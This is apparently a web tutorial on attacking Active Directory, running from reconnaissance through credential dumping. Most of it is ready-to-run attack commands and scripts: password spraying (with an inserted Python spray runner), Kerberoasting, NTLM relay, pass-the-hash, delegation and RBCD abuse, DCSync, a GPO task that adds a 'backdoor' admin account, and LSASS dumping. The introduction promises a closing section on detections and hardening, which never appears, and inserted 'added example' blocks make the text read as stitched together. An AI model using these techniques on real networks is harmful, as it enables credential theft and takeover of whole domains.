Active Directory Penetration Testing: Complete Attack Methodology and Techniques
Comprehensive guide to Active Directory penetration testing covering reconnaissance, enumeration, exploitation, lateral movement, privilege escalation, and persistence techniques with practical examples.
Active Directory Penetration Testing: Complete Attack Methodology
Active Directory (AD) is the identity backbone of most enterprise Windows networks: it decides who can authenticate, what they can reach, and which systems trust each other. Understanding how to assess and exploit AD environments is essential for penetration testers and red teamers. This guide covers the complete attack lifecycle in AD environments, from reconnaissance to persistence, and closes with the detections and hardening that counter each phase.
Understanding Active Directory
What is Active Directory?
Active Directory is Microsoft's directory service that manages:
- User accounts and authentication (Kerberos and NTLM)
- Computer accounts and resources
- Group Policy for centralized configuration management
- Access control and permissions (ACLs on directory objects)
- Trust relationships between domains and forests
Why Target Active Directory?
- Central point of control: compromising AD (in practice a Domain Controller or the krbtgt account) gives control of every domain-joined system
- Credential goldmine: the NTDS.dit database holds the password hashes of every domain account
- Privilege escalation: many paths to Domain Admin through misconfigured ACLs, delegation settings and service accounts
- Lateral movement: domain credentials and tickets are accepted by every domain-joined host
- Persistence: multiple ways to maintain access that survive password resets
Common AD Components
- Domain Controller (DC): authenticates users, serves Group Policy and stores the AD database (NTDS.dit)
- Domain: a logical grouping of objects with its own policies; note that the forest, not the domain, is the real security boundary
- Forest: a collection of domains that share a common schema and configuration partition
- Organizational Units (OUs): containers for users and computers to which Group Policy Objects are linked
- Trust Relationships: allow principals from one domain to access resources in another; can be one-way or two-way, transitive or non-transitive
Penetration Testing Methodology
Phase 1: Initial Reconnaissance
External Reconnaissance
The SRV lookups below only answer when you can reach a DNS server that hosts the zone, which for an internal AD domain usually means you are already on the network or on VPN; from the outside they mostly tell you whether the AD DNS zone is exposed at all.

```bash
# Identify Domain Controllers via the DC-specific SRV record
nslookup -type=SRV _ldap._tcp.dc._msdcs.target.com
# List LDAP servers for the domain (normally the same DCs)
nslookup -type=SRV _ldap._tcp.target.com
# Locate the Kerberos KDC
nslookup -type=SRV _kerberos._tcp.target.com

# Certificate transparency: search crt.sh for the target's subdomains
# (https://crt.sh/?q=%25.target.com)

# OSINT gathering
# - LinkedIn for employee names (user enumeration, naming conventions)
# - Company website and document metadata for usernames and e-mail formats
```
Network Discovery

```bash
# Identify live hosts
nmap -sn 192.168.1.0/24

# Service discovery (a full port sweep of a /24 is slow and noisy; scope it)
nmap -sV -p- 192.168.1.0/24

# Identify Domain Controllers by their characteristic port set
nmap -p 53,88,389,445,464,636,3268,3269 192.168.1.0/24

# Common AD ports:
# 53:   DNS (DCs are usually the domain's DNS servers)
# 88:   Kerberos
# 389:  LDAP
# 445:  SMB
# 464:  Kerberos password change (kpasswd)
# 636:  LDAPS
# 3268: Global Catalog (3269 over TLS)
# 3389: RDP
# 5985: WinRM (PowerShell Remoting)
```
Phase 2: Enumeration
Anonymous/Guest Enumeration
Null sessions and anonymous LDAP binds are disabled by default on current DCs, but legacy settings and an enabled Guest account are still common; try both before moving on to authenticated enumeration.

```bash
# SMB enumeration with a null session
enum4linux -a 192.168.1.10

# Anonymous LDAP bind (fails unless anonymous access has been explicitly enabled)
ldapsearch -x -H ldap://192.168.1.10 -b "dc=target,dc=com"

# RPC enumeration over a null session
rpcclient -U "" -N 192.168.1.10
# rpcclient $> enumdomusers
# rpcclient $> enumdomgroups
# rpcclient $> querydominfo

# SMB share enumeration
smbclient -L //192.168.1.10 -N

# Using CrackMapExec: null session and Guest account across the subnet
crackmapexec smb 192.168.1.0/24 -u '' -p '' --shares
crackmapexec smb 192.168.1.0/24 -u 'guest' -p '' --shares
crackmapexec smb 192.168.1.10 -u '' -p '' --users
```
Authenticated Enumeration
Using BloodHound

```powershell
# Collect data with SharpHound (from a domain-joined host, or under runas /netonly)
.\SharpHound.exe -c All
# -c All includes session and local-group collection, which connects to every
# computer in the domain; use -c DCOnly when that noise is unacceptable
.\SharpHound.exe -c DCOnly
```

```bash
# From Linux with bloodhound-python (resolve names through the domain's DNS server)
bloodhound-python -u user -p password -d target.com -dc dc01.target.com -ns 192.168.1.10 -c All
```

Analyze in the BloodHound GUI:
- Find shortest paths to Domain Admins
- Identify ACL abuse paths (GenericAll, WriteDacl, WriteOwner, AddMember)
- Find Kerberoastable accounts
- Identify AS-REP Roastable users
Using PowerView

```powershell
# Import PowerView
Import-Module .\PowerView.ps1

# Get domain info
Get-Domain
Get-DomainController

# User enumeration
Get-DomainUser
Get-DomainUser -Identity admin
Get-DomainUser -SPN           # Kerberoastable users

# Computer enumeration
Get-DomainComputer
Get-DomainComputer -OperatingSystem "*Server 2019*"

# Group enumeration
Get-DomainGroup
Get-DomainGroupMember -Identity "Domain Admins"

# Find shares
Find-DomainShare
Find-InterestingDomainShareFile

# ACL enumeration
Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs
Find-InterestingDomainAcl -ResolveGUIDs

# Trust enumeration
Get-DomainTrust
Get-ForestTrust
```
Using ADRecon

```powershell
# Comprehensive AD enumeration
.\ADRecon.ps1 -OutputDir C:\temp\ADRecon
# Generates an Excel report with:
# - Users, groups, computers
# - GPOs, OUs, trusts
# - ACLs and permissions
# - Security misconfigurations
```
Phase 3: Initial Access
Credential Attacks
Password Spraying
Read the lockout policy before the first attempt: a spray that locks out hundreds of accounts ends the engagement early and is trivially detected.

```bash
# Read the domain lockout policy first (threshold, duration, observation window);
# this works over a null session on many DCs
crackmapexec smb 192.168.1.10 -u '' -p '' --pass-pol
# or, from a domain-joined Windows host: net accounts /domain

# Using CrackMapExec: one password against the whole user list
crackmapexec smb 192.168.1.10 -u users.txt -p 'Password123' --continue-on-success

# Using Sprayhound (reads the lockout threshold from LDAP and stops before tripping it)
sprayhound -U users.txt -d target.com -dc 192.168.1.10 -p 'Winter2024!'
```

```powershell
# Using Invoke-DomainPasswordSpray (reads the policy and pauses between sprays)
Import-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -Password "Password123"
```

Best practices:
- Use a short list of likely passwords: seasonal patterns such as Summer2024!, the company name, Welcome1
- Stay below the lockout threshold: at most (threshold - 2) attempts per user inside one observation window
- Spread attempts over time and across source hosts to avoid a burst of 4625/4771 events from one IP
- Skip accounts that are already close to the threshold (badPwdCount is readable over LDAP)
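The "respect the lockout policy" advice becomes concrete once you turn the policy into a schedule. The following is an added example (not tooling from this page or from any of the spraying tools above): it parses the lockout values as printed by `net accounts /domain`, splits a password list into rounds that stay below the threshold within one observation window, and drives a caller-supplied login function. The login function here is an offline stub, and the sample policy text, usernames and passwords are constructed for illustration.

```python
"""Lockout-aware password spray planner (added example, not from the page)."""
import re
import time
from dataclasses import dataclass


@dataclass
class LockoutPolicy:
    threshold: int          # 0 = accounts never lock out
    window_minutes: int     # badPwdCount resets after this many minutes
    duration_minutes: int


# Constructed sample of `net accounts /domain` output (only the lockout lines matter).
SAMPLE_NET_ACCOUNTS = """\
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          1
Maximum password age (days):                          90
Minimum password length:                              8
Length of password history maintained:                24
Lockout threshold:                                    5
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        PRIMARY
"""


def parse_net_accounts(text):
    """Extract the three lockout values; a threshold of 'Never' means no lockout."""
    def grab(label):
        m = re.search(r"^%s:\s+(\S+)" % re.escape(label), text, re.M)
        if not m:
            raise ValueError("missing field: " + label)
        return m.group(1)
    raw = grab("Lockout threshold")
    return LockoutPolicy(
        threshold=0 if raw.lower() == "never" else int(raw),
        window_minutes=int(grab("Lockout observation window (minutes)")),
        duration_minutes=int(grab("Lockout duration (minutes)")),
    )


def plan_spray(passwords, policy, safety_margin=2):
    """Split passwords into (start_offset_minutes, [passwords]) rounds.

    Each round sends at most threshold - safety_margin guesses per user, and rounds
    are spaced one observation window apart so badPwdCount has reset before the next
    batch. A margin of 2 leaves room for one genuine typo by the user inside the
    window plus one bad count accumulated before the spray started."""
    passwords = list(passwords)
    if policy.threshold == 0:
        return [(0, passwords)]
    per_round = policy.threshold - safety_margin
    if per_round < 1:
        raise ValueError("threshold too low for the requested safety margin")
    return [(i // per_round * policy.window_minutes, passwords[i:i + per_round])
            for i in range(0, len(passwords), per_round)]


def run_spray(users, passwords, policy, try_login, sleep=time.sleep, safety_margin=2):
    """Execute the plan. try_login(user, password) -> bool. Returns the valid pairs.
    A user is dropped from later rounds as soon as one password works."""
    hits, pending = [], list(users)
    for round_no, (_, batch) in enumerate(plan_spray(passwords, policy, safety_margin)):
        if round_no > 0:
            sleep(policy.window_minutes * 60)   # let the observation window expire
        for password in batch:
            for user in list(pending):
                if try_login(user, password):
                    hits.append((user, password))
                    pending.remove(user)
    return hits


def demo_login(valid=(("bob", "Winter2024!"),)):
    """Offline stand-in for a real SMB/LDAP bind; records every attempt made."""
    attempts = []
    def try_login(user, password):
        attempts.append((user, password))
        return (user, password) in valid
    return try_login, attempts


if __name__ == "__main__":
    policy = parse_net_accounts(SAMPLE_NET_ACCOUNTS)
    candidates = ["Winter2024!", "Password123", "Welcome1", "Summer2024!"]
    for offset, batch in plan_spray(candidates, policy):
        print("t+%d min: %s" % (offset, batch))
    login, attempts = demo_login()
    print(run_spray(["alice", "bob"], candidates, policy, login, sleep=lambda s: None))
    print(len(attempts), "attempts made")
```

In a real run `try_login` wraps an SMB or LDAP bind and `sleep` is left as `time.sleep`; the planner is the part that matters, since it is what keeps a four-password spray from locking out every account in a domain with a threshold of 5.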
AS-REP Roasting
Accounts flagged "Do not require Kerberos preauthentication" (UF_DONT_REQUIRE_PREAUTH, 0x400000 in userAccountControl) return an AS-REP whose encrypted part is derived from the user's password key, so anyone who can reach the KDC can request it and crack it offline, no credentials required.

```powershell
# Using Rubeus
.\Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt
```

```bash
# Using Impacket without credentials: supply the candidate usernames yourself
GetNPUsers.py target.com/ -usersfile users.txt -format hashcat -dc-ip 192.168.1.10 -no-pass
# With credentials, Impacket finds the vulnerable accounts via LDAP
GetNPUsers.py target.com/user:password -dc-ip 192.168.1.10 -request -format hashcat

# Crack the hashes (mode 18200 = AS-REP with RC4, etype 23)
hashcat -m 18200 hashes.txt wordlist.txt
```

Setting the flag on an account you can write to makes it roastable; this is an ACL-abuse and persistence trick rather than an initial-access one, and requires WriteProperty on userAccountControl:

```powershell
Set-DomainObject -Identity user1 -XOR @{useraccountcontrol=4194304}
```
Kerberoasting
Any authenticated domain user can request a service ticket for any SPN; the ticket is encrypted with the service account's key, so tickets for human-managed service accounts (weak, rarely rotated passwords) can be cracked offline. Computer accounts also carry SPNs, but their passwords are random and not worth cracking.

```powershell
# Using Rubeus (requests RC4 tickets where the account allows it; those crack fastest)
.\Rubeus.exe kerberoast /outfile:hashes.txt
# Using PowerView
Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat Hashcat
```

```bash
# Using Impacket
GetUserSPNs.py target.com/user:password -dc-ip 192.168.1.10 -request -outputfile hashes.txt

# Crack with hashcat: 13100 for RC4 (etype 23); AES tickets need 19600 (etype 17) or 19700 (etype 18)
hashcat -m 13100 hashes.txt wordlist.txt
```
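The AS-REP and Kerberoast sections above both end in hashcat, and the mode depends on the encryption type encoded in the hash. The following added example (not code from the page, Rubeus or Impacket) parses the hash formats those tools emit, extracts the account, realm, SPN and etype, and returns the hashcat mode to use; `sort_for_cracking` groups a mixed file into one job per mode. The sample hashes are constructed (repeated hex, not real ciphertext) purely to exercise the parser.

```python
"""Parser for Rubeus / GetUserSPNs.py / GetNPUsers.py roasting hashes (added example)."""
import re

# hashcat modes by (hash kind, Kerberos encryption type)
HASHCAT_MODES = {
    ("tgs", 23): 13100,    # RC4-HMAC Kerberoast
    ("tgs", 17): 19600,    # AES128-CTS-HMAC-SHA1-96 Kerberoast
    ("tgs", 18): 19700,    # AES256-CTS-HMAC-SHA1-96 Kerberoast
    ("asrep", 23): 18200,  # RC4-HMAC AS-REP
}

# Constructed sample hashes: a 16-byte checksum and 40-byte edata stand in for the real values.
SAMPLE_HASHES = [
    "$krb5tgs$23$*svc_sql$TARGET.COM$MSSQLSvc/sql01.target.com:1433*$" + "ab" * 16 + "$" + "cd" * 40,
    "$krb5tgs$18$svc_backup$TARGET.COM$*cifs/backup01.target.com*$" + "12" * 12 + "$" + "ef" * 40,
    "$krb5asrep$23$jdoe@TARGET.COM:" + "34" * 16 + "$" + "56" * 40,
]


def parse_roast_hash(h):
    """Return kind, etype, user, realm, spn, checksum, edata and hashcat_mode for one hash."""
    h = h.strip()
    m = re.match(r"^\$(krb5tgs|krb5asrep)\$(\d+)\$(.*)$", h, re.S)
    if not m:
        raise ValueError("not a krb5tgs/krb5asrep hash")
    kind = "tgs" if m.group(1) == "krb5tgs" else "asrep"
    etype = int(m.group(2))
    rest = m.group(3)
    spn = None
    if kind == "asrep":
        # $krb5asrep$23$user@REALM:checksum$edata
        ident, _, tail = rest.partition(":")
        user, _, realm = ident.partition("@")
        checksum, _, edata = tail.partition("$")
    elif rest.startswith("*"):
        # RC4 TGS layout: *user$REALM$spn*$checksum$edata (the SPN itself may contain ':' or '/')
        end = rest.index("*", 1)
        user, realm, spn = rest[1:end].split("$", 2)
        checksum, _, edata = rest[end + 2:].partition("$")
    else:
        # AES TGS layout: user$REALM$[*spn*$]checksum$edata (Impacket includes the SPN, hashcat's example omits it)
        parts = rest.split("$")
        user, realm = parts[0], parts[1]
        if parts[2].startswith("*"):
            spn = parts[2].strip("*")
            checksum, edata = parts[3], parts[4]
        else:
            checksum, edata = parts[2], parts[3]
    return {"kind": kind, "etype": etype, "user": user, "realm": realm, "spn": spn,
            "checksum": checksum, "edata": edata,
            "hashcat_mode": HASHCAT_MODES.get((kind, etype))}


def sort_for_cracking(hashes):
    """Group hashes by hashcat mode (one cracking job per mode) and list the accounts whose
    ticket came back RC4-encrypted; those are the cheap ones and should be cracked first."""
    by_mode, rc4_accounts = {}, []
    for h in hashes:
        info = parse_roast_hash(h)
        by_mode.setdefault(info["hashcat_mode"], []).append(h)
        if info["etype"] == 23:
            rc4_accounts.append(info["user"])
    return by_mode, rc4_accounts


if __name__ == "__main__":
    for h in SAMPLE_HASHES:
        info = parse_roast_hash(h)
        print("%-5s etype=%-2d mode=%-5s %s@%s spn=%s" % (
            info["kind"], info["etype"], info["hashcat_mode"], info["user"], info["realm"], info["spn"]))
    by_mode, rc4 = sort_for_cracking(SAMPLE_HASHES)
    print({mode: len(v) for mode, v in by_mode.items()}, "RC4 accounts:", rc4)
```

An unsupported combination (for example an AES AS-REP hash, which needs a different hashcat mode) comes back with `hashcat_mode` set to `None` rather than a wrong mode, so a caller can refuse to start a job it would silently misconfigure.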
NTLM Relay Attacks
Relaying captured NTLM authentication only works against targets that do not require signing (SMB) or channel binding (LDAPS, HTTP). Generate the target list first, then make sure Responder is not answering on the protocols you intend to relay.

```bash
# Find hosts where SMB signing is not required: these are the relay targets
crackmapexec smb 192.168.1.0/24 --gen-relay-list targets.txt

# Poison LLMNR/NBT-NS/mDNS; set SMB = Off and HTTP = Off in Responder.conf so the
# incoming authentication reaches ntlmrelayx instead of Responder's own servers
responder -I eth0 -w

# Relay to the target list
ntlmrelayx.py -tf targets.txt -smb2support
```

Ways to make a victim authenticate to the attacker:
- A link to an attacker-controlled SMB share (UNC path in a document, shortcut or web page)
- Phishing with UNC paths
- Print spooler abuse (coercing a server or DC to authenticate back to you)

Mitigation check: signing should be required on every host; the relay list generated above is also the list of systems that fail that check.
Phase 4: Lateral Movement
Pass the Hash (PtH)
NTLM authentication only needs the NT hash, so a hash dumped from one host can be used directly against any host that still accepts NTLM. The LM half (aad3b435b51404eeaad3b435b51404ee) is empty on modern systems and can be omitted.

```bash
# Using CrackMapExec (a "Pwn3d!" result means the account is local admin on that host)
crackmapexec smb 192.168.1.0/24 -u admin -H 'aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c'
# Using Impacket
psexec.py -hashes ':8846f7eaee8fb117ad06bdd830b7586c' admin@192.168.1.20
# Using Evil-WinRM
evil-winrm -i 192.168.1.20 -u admin -H '8846f7eaee8fb117ad06bdd830b7586c'
```
Pass the Ticket (PtT)

```powershell
# List and export tickets with Rubeus (elevation is needed to read other sessions' tickets)
.\Rubeus.exe triage
.\Rubeus.exe dump /nowrap
# Inject a ticket into the current logon session
.\Rubeus.exe ptt /ticket:base64ticket
```

```bash
# Linux: point Impacket at a ccache file and authenticate with Kerberos (use the FQDN, not the IP)
export KRB5CCNAME=/tmp/ticket.ccache
psexec.py target.com/admin@server01.target.com -k -no-pass
# Convert between Windows .kirbi and ccache when moving tickets between hosts
ticketConverter.py ticket.kirbi ticket.ccache
```
Overpass the Hash
Use an NTLM hash (or AES key) to request a Kerberos TGT, then authenticate with Kerberos instead of NTLM. Using the AES key avoids the RC4 downgrade that defenders alert on (4768 with etype 0x17 in an AES domain).

```powershell
# Using Rubeus
.\Rubeus.exe asktgt /user:admin /rc4:8846f7eaee8fb117ad06bdd830b7586c /ptt
.\Rubeus.exe asktgt /user:admin /aes256:<aes256-key> /opsec /ptt
```

```bash
# Using Impacket
getTGT.py target.com/admin -hashes ':8846f7eaee8fb117ad06bdd830b7586c' -dc-ip 192.168.1.10
export KRB5CCNAME=admin.ccache
```
WMI and PowerShell Remoting

```powershell
# WMI execution (requires local admin on the target; 135/TCP plus dynamic DCOM ports)
wmic /node:192.168.1.20 /user:admin /password:pass process call create "cmd.exe"
Invoke-WmiMethod -ComputerName 192.168.1.20 -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c whoami > C:\temp\out.txt"

# PowerShell Remoting over WinRM (5985/5986; the user must be a local admin or in Remote Management Users)
Enter-PSSession -ComputerName SERVER01 -Credential domain\admin
Invoke-Command -ComputerName SERVER01 -ScriptBlock {whoami}
```

```bash
# Using CrackMapExec over SMB, WinRM or WMI
crackmapexec smb 192.168.1.20 -u admin -p password -x "whoami"
crackmapexec winrm 192.168.1.20 -u admin -p password -x "whoami"
crackmapexec wmi 192.168.1.20 -u admin -p password -x "whoami"
```
Phase 5: Privilege Escalation
Local Privilege Escalation

```powershell
# Check privileges and group membership
whoami /priv
whoami /groups

# Classic misconfigurations to look for:
# - Unquoted service paths
# - Weak permissions on service binaries or service objects
# - AlwaysInstallElevated
# - Credentials in files, the registry and scheduled tasks

# Using PowerUp
Import-Module .\PowerUp.ps1
Invoke-AllChecks
# Using PrivescCheck
Import-Module .\PrivescCheck.ps1
Invoke-PrivescCheck

# Token impersonation when SeImpersonatePrivilege is held (typical for IIS and SQL service contexts)
.\PrintSpoofer.exe -i -c cmd
.\JuicyPotato.exe -l 1337 -c {...} -p cmd.exe -t *
```
Domain Privilege Escalation
DCSync Attack
DCSync asks a DC to replicate account secrets over the DRSUAPI RPC interface, exactly as another DC would. It needs the extended rights Replicating Directory Changes and Replicating Directory Changes All on the domain object; Domain Admins, Enterprise Admins, DC computer accounts and, frequently, Azure AD Connect service accounts hold them. No code runs on the DC, so it is far quieter than copying NTDS.dit.

```text
# Using Mimikatz
lsadump::dcsync /domain:target.com /user:Administrator
lsadump::dcsync /domain:target.com /user:krbtgt
```

```bash
# Using Impacket: -just-dc limits the dump to NTDS (skips the DC's own SAM and LSA secrets)
secretsdump.py -just-dc target.com/admin:password@192.168.1.10
# Only the NTLM hashes, without the Kerberos keys
secretsdump.py -just-dc-ntlm target.com/admin:password@192.168.1.10
```
Unconstrained Delegation
A server trusted for unconstrained delegation caches the TGT of every user (or computer) that authenticates to it. Once such a server is compromised you can either wait for a privileged user to connect, or coerce a DC into authenticating to it and take the DC machine account's TGT, which is enough for DCSync.

```powershell
# Find computers with unconstrained delegation (DCs have it by default; anything else is a finding)
Get-DomainComputer -Unconstrained -Properties dnshostname

# On the compromised server: list cached tickets and extract the one you want
.\Rubeus.exe triage
.\Rubeus.exe dump /luid:0x123456 /nowrap
# Watch for new TGTs arriving (for example after coercing DC01$ to authenticate)
.\Rubeus.exe monitor /interval:5 /targetuser:DC01$ /nowrap
```
Constrained Delegation
An account trusted for constrained delegation (msDS-AllowedToDelegateTo) can obtain service tickets for the listed SPNs on behalf of arbitrary users via S4U2Self/S4U2Proxy. The service name inside the resulting ticket is not protected, so a ticket for one service on a host can be rewritten for another service (cifs, ldap, host) on the same host.

```powershell
# Find constrained delegation
Get-DomainUser -TrustedToAuth -Properties samaccountname,msds-allowedtodelegateto
Get-DomainComputer -TrustedToAuth -Properties dnshostname,msds-allowedtodelegateto

# Exploit with Rubeus: /msdsspn must be an SPN listed in msDS-AllowedToDelegateTo (a host SPN, not the domain)
.\Rubeus.exe s4u /user:serviceaccount /rc4:hash /impersonateuser:administrator /msdsspn:cifs/server01.target.com /altservice:ldap /ptt
```

```bash
# Using Impacket
getST.py -spn cifs/server01.target.com -impersonate administrator -dc-ip 192.168.1.10 target.com/serviceaccount:password
export KRB5CCNAME=<ccache file written by getST>
```
Resource-Based Constrained Delegation (RBCD)
RBCD is configured on the target (resource) side, in msDS-AllowedToActOnBehalfOfOtherIdentity. Anyone with write access to that attribute on a computer object (GenericWrite, WriteProperty or ownership) can add an account they control and then impersonate any user to that computer via S4U2Proxy. The controlled account needs an SPN, which is why a fresh machine account is created (MachineAccountQuota is 10 by default).

```powershell
# Create a new computer account (needs MachineAccountQuota > 0)
Import-Module .\Powermad.ps1
New-MachineAccount -MachineAccount attackerpc -Password $(ConvertTo-SecureString 'Password123!' -AsPlainText -Force)

# Build a security descriptor granting attackerpc$ full control and write it to the target
$ComputerSid = Get-DomainComputer attackerpc -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer target-server | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

# Derive the RC4 key of the new account, then impersonate Administrator to the target
.\Rubeus.exe hash /password:Password123! /user:attackerpc$ /domain:target.com
.\Rubeus.exe s4u /user:attackerpc$ /rc4:hash /impersonateuser:administrator /msdsspn:cifs/target-server.target.com /ptt
```

```bash
# The same attack from Linux with Impacket
addcomputer.py -computer-name 'attackerpc$' -computer-pass 'Password123!' -dc-ip 192.168.1.10 target.com/user:password
rbcd.py -delegate-from 'attackerpc$' -delegate-to 'target-server$' -action write -dc-ip 192.168.1.10 target.com/user:password
getST.py -spn cifs/target-server.target.com -impersonate administrator -dc-ip 192.168.1.10 'target.com/attackerpc$:Password123!'
```
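The PowerShell above hides the attribute's binary layout behind `RawSecurityDescriptor`, and rbcd.py does the equivalent with Impacket's `ldaptypes`. The following is an added example (not code from the page, PowerView or Impacket) that builds the same self-relative security descriptor in pure Python and, more usefully for a defender, parses an existing msDS-AllowedToActOnBehalfOfOtherIdentity value back into the list of SIDs allowed to act on behalf of the computer. The owner is BUILTIN\Administrators as in the SDDL `O:BA`, the ACE mask is the one `CCDCLCSWRPWPDTLOCRSDRCWDWO` expands to, and all domain SIDs are constructed.

```python
"""Build and parse the RBCD security descriptor (added example, not from the page)."""
import struct

# CCDCLCSWRPWPDTLOCRSDRCWDWO: all directory-specific rights (0x1FF) plus
# DELETE, READ_CONTROL, WRITE_DAC and WRITE_OWNER (0xF0000) = 983551
RBCD_ACCESS_MASK = 0x000F01FF
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00
SD_HEADER = "<BBHIIII"   # Revision, Sbz1, Control, OffsetOwner, OffsetGroup, OffsetSacl, OffsetDacl
ACL_HEADER = "<BBHHH"    # AclRevision, Sbz1, AclSize, AceCount, Sbz2
ACE_HEADER = "<BBHI"     # AceType, AceFlags, AceSize, Mask


def sid_to_bytes(sid):
    """'S-1-5-21-...' -> binary SID: revision, sub-authority count, 48-bit big-endian
    identifier authority, then little-endian 32-bit sub-authorities."""
    parts = sid.split("-")
    if len(parts) < 3 or parts[0] != "S" or parts[1] != "1":
        raise ValueError("malformed SID: " + sid)
    subs = [int(p) for p in parts[3:]]
    return (struct.pack("<BB", 1, len(subs)) + int(parts[2]).to_bytes(6, "big")
            + struct.pack("<%dI" % len(subs), *subs))


def bytes_to_sid(data, offset=0):
    """Binary SID at offset -> (string SID, length in bytes)."""
    rev, count = struct.unpack_from("<BB", data, offset)
    authority = int.from_bytes(data[offset + 2:offset + 8], "big")
    subs = struct.unpack_from("<%dI" % count, data, offset + 8)
    return "S-%d-%d-%s" % (rev, authority, "-".join(str(s) for s in subs)), 8 + 4 * count


def build_rbcd_sd(allowed_sids, owner_sid="S-1-5-32-544"):
    """Self-relative SD: 20-byte header, owner SID (BUILTIN\\Administrators, i.e. O:BA),
    no group, no SACL, then a DACL with one full-control ACCESS_ALLOWED_ACE per SID."""
    owner = sid_to_bytes(owner_sid)
    aces = b""
    for sid in allowed_sids:
        sid_bytes = sid_to_bytes(sid)
        aces += struct.pack(ACE_HEADER, ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_bytes), RBCD_ACCESS_MASK) + sid_bytes
    dacl = struct.pack(ACL_HEADER, 4, 0, 8 + len(aces), len(allowed_sids), 0) + aces
    header_len = struct.calcsize(SD_HEADER)
    header = struct.pack(SD_HEADER, 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT,
                         header_len, 0, 0, header_len + len(owner))
    return header + owner + dacl


def parse_rbcd_sd(blob):
    """Attribute bytes -> {'owner': sid, 'allowed': [{'sid', 'mask', 'full_control'}, ...]}.
    Offsets are read from the header, so descriptors laid out in a different order parse too."""
    rev, _, control, off_owner, _, _, off_dacl = struct.unpack_from(SD_HEADER, blob, 0)
    if rev != 1 or not control & SE_SELF_RELATIVE:
        raise ValueError("not a self-relative security descriptor")
    owner = bytes_to_sid(blob, off_owner)[0] if off_owner else None
    allowed = []
    if control & SE_DACL_PRESENT and off_dacl:
        _, _, _, ace_count, _ = struct.unpack_from(ACL_HEADER, blob, off_dacl)
        pos = off_dacl + struct.calcsize(ACL_HEADER)
        for _ in range(ace_count):
            ace_type, _, ace_size, mask = struct.unpack_from(ACE_HEADER, blob, pos)
            if ace_type == ACCESS_ALLOWED_ACE_TYPE:
                sid, _ = bytes_to_sid(blob, pos + struct.calcsize(ACE_HEADER))
                allowed.append({"sid": sid, "mask": mask,
                                "full_control": mask & RBCD_ACCESS_MASK == RBCD_ACCESS_MASK})
            pos += ace_size   # skip unknown ACE types by their declared size
    return {"owner": owner, "allowed": allowed}


if __name__ == "__main__":
    attacker_sid = "S-1-5-21-1111111111-2222222222-3333333333-1105"   # constructed attackerpc$ SID
    blob = build_rbcd_sd([attacker_sid])
    print(blob.hex())
    print(parse_rbcd_sd(blob))
```

For auditing, read msDS-AllowedToActOnBehalfOfOtherIdentity from every computer object over LDAP and feed the bytes to `parse_rbcd_sd`; any SID that is not a known, intentionally delegated service (and especially a recently created machine account) is exactly the artefact this attack leaves behind.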
GPO Abuse
Write access to a GPO (or to the SYSVOL files behind it) lets you push settings, scheduled tasks or local-group changes to every computer the GPO is linked to. Check where it is linked before modifying it: a domain-wide policy is loud.

```powershell
# Find GPOs where you have write access
Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | Where-Object {$_.ActiveDirectoryRights -match "WriteProperty|GenericAll|GenericWrite|WriteDacl|WriteOwner"}
# See which OUs a GPO is linked to
Get-DomainOU -GPLink "<GPO GUID>" -Properties distinguishedname

# Add a user to local Administrators via a GPO
# Using SharpGPOAbuse
.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount attacker --GPOName "Vulnerable GPO"
# Using PowerView (older builds): an immediate scheduled task that runs at the next policy refresh
New-GPOImmediateTask -TaskName Update -GPODisplayName "Vulnerable GPO" -CommandArguments "-c 'net user backdoor Password123! /add && net localgroup administrators backdoor /add'"
```

Clients apply the change at the next Group Policy refresh (every 90 minutes plus a random offset by default), or immediately after `gpupdate /force` on a host you already control.
ACL Abuse
BloodHound surfaces these edges; each right maps to a concrete action. GenericAll or WriteDacl on a user, group or computer is as good as owning it.

```powershell
# GenericAll / ForceChangePassword on a user: reset the password (the user will notice)
Set-DomainUserPassword -Identity target-user -AccountPassword (ConvertTo-SecureString 'NewPassword!' -AsPlainText -Force)

# GenericAll / WriteProperty(member) / AddMember on a group: add yourself
Add-DomainGroupMember -Identity "Domain Admins" -Members attacker

# WriteDacl on an object: grant yourself GenericAll, then use it
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity attacker -Rights All

# WriteOwner: take ownership first; the owner can then rewrite the DACL
Set-DomainObjectOwner -Identity "Domain Admins" -OwnerIdentity attacker

# GenericWrite on a user: targeted Kerberoast (set an SPN, request the ticket, remove the SPN)
Set-DomainObject -Identity target-user -Set @{serviceprincipalname='fake/roast'}
Get-DomainUser target-user | Get-DomainSPNTicket -OutputFormat Hashcat
Set-DomainObject -Identity target-user -Clear serviceprincipalname

# GenericWrite on a computer: configure RBCD (see above)
```
Phase 6: Credential Dumping
LSASS Dumping
Requires local admin (SeDebugPrivilege). Credential Guard, LSA running as a protected process and EDR hooks all interfere; dumping the process to a file and parsing it offline avoids running Mimikatz on the host.

```text
# Using Mimikatz on the host
privilege::debug
sekurlsa::logonpasswords
```

```powershell
# Using Procdump (signed Sysinternals binary)
procdump.exe -accepteula -ma lsass.exe lsass.dmp
# Using the built-in comsvcs.dll MiniDump export (replace 624 with the PID of lsass.exe)
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\temp\lsass.dmp full
# Using Task Manager: right-click lsass.exe -> Create dump file
```

```text
# Parse the dump offline with Mimikatz
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
```

```bash
# Using pypykatz (Linux)
pypykatz lsa minidump lsass.dmp
```
